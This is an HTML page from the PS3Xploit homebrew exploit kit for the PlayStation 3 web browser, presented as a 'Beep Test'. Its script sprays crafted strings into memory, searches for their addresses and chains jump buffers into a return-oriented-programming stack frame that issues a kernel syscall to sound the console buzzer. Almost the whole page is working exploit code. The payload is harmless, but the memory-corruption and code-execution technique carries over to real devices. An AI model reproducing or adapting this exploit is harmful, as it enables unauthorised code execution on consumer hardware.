<!DOCTYPE html>
<html>
<head>
<script src="ps3xploit_v307.js"></script>
<meta charset="UTF-8"> 
<title>Beep Test</title>
<script>
function initROP(init)
{
	try
	{
		if(init===true){frame_fails=0;search_base_off=0;search_size_ext=0;}
		if(t_out!==0){clearTimeout(t_out);t_out=0;}
		offset_array=[];
		disable_all();
		clearLogEntry();
		xtra_data_addr=0;
		stack_frame_addr=0;
		jump_2_addr=0;
		jump_1_addr=0;
		var search_max_threshold=70*0x100000; // 70Mb maximum memory search
		var search_base=0x80100000;//0x80190000;//
		var search_size=2*mbytes;
		search_size_ext=0*mbytes;
		search_base_off=0*mbytes;
		total_loops++;
		
		xtra_data=start_x.convert()+ps3xploit_ecdsa_key.convert(true)
		+index_key.convert(true)
		+unescape("\uFD7E");
		while(xtra_data_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));
			xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);
			search_max_threshold-=search_size;
		}
		
		//############################ Building stack frame ###############################################################
		stack_frame=stack_frame_hookup()
		
		+syscall(0x00000188,0x00001004,0x0000000A,0x000001B6,0,0,0,0,0)
		
		+stack_frame_exit();
		//############################ End stack frame ###############################################################		
		
		while(stack_frame_addr===0)
		{
			if(search_max_threshold<search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0;}load_check();return;}
			stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));
			stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);
			if(stack_frame_addr==-1)if(search_max_threshold<search_size+search_size_ext){frame_fails++;load_check();return;}
			search_max_threshold-=search_size+search_size_ext;
		}
		jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,dbyte41)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");		
		while(jump_2_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));
			jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);
			if(jump_2_addr==-1)if(search_max_threshold<search_size){load_check();return;}
			search_max_threshold-=search_size;
		}
		jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");
		while(jump_1_addr===0)
		{
			if(search_max_threshold<search_size){load_check();return;}
			jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));
			jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);
			if(jump_1_addr==-1)if(search_max_threshold<search_size){load_check();return;}
			search_max_threshold-=search_size;
		}
		var sf=checkMemory(stack_frame_addr-0x4,0x30000,stack_frame.length);
		var x=checkMemory(xtra_data_addr-0x4,0x10000,xtra_data.length);
		var j2=checkMemory(jump_2_addr-0x4,0x800,jump_2.length);
		var j1=checkMemory(jump_1_addr-0x4,0x800,jump_1.length);
		if((j2===jump_2)&&(j1===jump_1)&&(x===xtra_data)&&(sf===stack_frame))
		{
			if(t_out!==0){clearTimeout(t_out);}
			showResult(hr+"<h1><b><font color=%22386E38%22>Beep Test initialized successfully.</font></b></h1><h3><b><span style='color:#000000;'>You can now launch Beep Test.</span></b></h3>");
			enable_trigger();
		}
		else
		{
			if(x!==xtra_data)logAdd("xtra_data mismatch in memory!");
			if(sf!==stack_frame)logAdd("stack_frame mismatch in memory!");
			if(j2!==jump_2)logAdd("jump_2 mismatch in memory!");
			if(j1!==jump_1)logAdd("jump_1 mismatch in memory!");
			//logAdd("String mismatch in memory!");
			load_check();
		}
	}
	catch(e)
	{
		debug=true;
		logAdd(br+"Beep Test initialization failed because the following exception was thrown during execution:"+br+e+" at : "+e.lineNumber);
		debug=false;
	}
}

function triggerX()
{
		clearLogEntry();
		showResult(hr+"<h2><b><span style='color:#000000;'>Triggering Buzzer...</span></b></h2>");
		disable_all();
		setTimeout(trigger,1000,jump_1_addr);
		setTimeout(rop_exit,2000,hr+"<h1><b><font color=%22386E38%22>Beep Test succeeded!</font></span></b></h1>");
		cleanGUI();
}
</script>
</head>
	<body id="bodyId" style="background-color:#3a4a8a">
	<div id="headerId" style="color:#1b146e">
	<h1>Beep Test</h1>
	<hr></div>
	<p>Auto-Close Browser <input type="checkbox" id="auto_close" name="aclose" checked="checked" onclick="autoclose();"/>
	<span id="dex_txt" style="visibility:hidden"> | DEX mode<input type="checkbox" id="dex" name="DEX" disabled="" onclick="dex();"/></span></p>
	<p><button id="btnROP" type="button" onclick="initROP(true);" autofocus>Initialize Beep Test</button> | 
	<button id="btnTrigger" disabled="" type="button" onclick="triggerX();">Trigger Buzzer</button><span id="reset" style="visibility:hidden"> | <button id="btnReset" type="button" onclick="disable_trigger();">Reset</button></span></p>
	<div id="result" style="color:#CC2010"></div><br>
	<div id="log"></div>
	<div id="exploit" ></div>
	<div id="trigger"></div>
	<div id="footer"></div>
	<script>
		//writeEnvInfo();
		ps3chk();
	</script>
	</body>
</html>